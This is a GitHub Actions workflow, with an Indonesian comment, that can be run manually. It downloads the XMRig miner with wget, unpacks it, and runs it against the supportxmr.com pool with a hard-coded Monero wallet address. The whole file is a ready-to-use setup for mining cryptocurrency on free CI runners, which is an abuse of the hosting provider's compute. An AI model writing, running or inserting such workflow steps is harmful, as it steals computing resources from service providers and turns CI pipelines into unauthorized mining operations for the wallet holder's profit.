name: Install XMRig

on:
  workflow_dispatch: # bisa dijalankan manual lewat tab Actions

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repo
        uses: actions/checkout@v4

      - name: Download XMRig
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
          tar -xzf xmrig-6.24.0-linux-static-x64.tar.gz
          cd xmrig-6.24.0
          ./xmrig -o pool.supportxmr.com:3333 -u 43YesyPEfNHZmiBjf1LBBB5QaUYWZHoohcexHc4xpbWB9jTzAD7XTjYHqaoyNmYamWb9Eheq4uvjQ4YhdHtNcaawHYrV2NB  -p x 
